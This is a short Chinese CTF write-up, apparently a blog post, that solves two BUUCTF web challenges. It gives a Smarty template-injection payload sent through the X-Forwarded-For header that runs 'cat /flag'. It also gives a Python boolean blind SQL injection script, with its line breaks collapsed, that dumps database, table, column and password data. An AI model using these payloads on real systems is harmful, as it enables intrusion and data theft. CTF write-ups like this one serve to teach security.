[CISCN2019 华东南赛区]Web11
抓个包可以发现是 Smarty框架
在页面可以观察到 一个 XFF头, 可以猜测注入点就在这
通过 if 标签执行命令 ,读取flag
if system("cat /flag")}{/if}
[极客大挑战 2019]FinalSQL
一个登录框, 上面的提示应该就是要你盲注了
点一下那些数字会url上面有变化, /?id= , 应该就是注入点了
然后就是写脚本进行盲注了
学习一下别人的脚本:
import requests
import time# url是随时更新的,具体的以做题时候的为准
url = 'http://1b56e0e9-cb22-45bf-98c0-87a739a6312c.node5.buuoj.cn:81/search.php?id='
i = 0
flag = ''
while True:i += 1# 从可打印字符开始begin = 32end = 126tmp = (begin + end) // 2while begin < end:print(begin, tmp, end)time.sleep(0.1)# 爆数据库# payload = "''or(ascii(substr(database(),%d,1))>%d)" % (i, tmp)# 爆表# payload = "''or(ascii(substr((select(GROUP_CONCAT(TABLE_NAME))from(information_schema.tables)where(TABLE_SCHEMA=database())),%d,1))>%d)" % (i, tmp)# 爆字段# payload = "''or(ascii(substr((select(GROUP_CONCAT(COLUMN_NAME))from(information_schema.COLUMNS)where(TABLE_NAME='F1naI1y')),%d,1))>%d)" % (i, tmp)# 爆flag 要跑很久# payload = "''or(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" % (i, tmp)# 爆flag 很快payload = "''or(ascii(substr((select(password)from(F1naI1y)where(username='flag')),%d,1))>%d)" % (i, tmp)# 错误示例# payload = "''or(ascii(substr((select(GROUP_CONCAT(fl4gawsl))from(Flaaaaag)),%d,1))>%d)" % (i, tmp)r = requests.get(url+payload)if 'Click' in r.text:begin = tmp + 1tmp = (begin + end) // 2else:end = tmptmp = (begin + end) // 2flag += chr(tmp)print(flag)if begin == 32:breakhttps://blog.csdn.net/Chu_Jian_Xiong/article/details/109071522
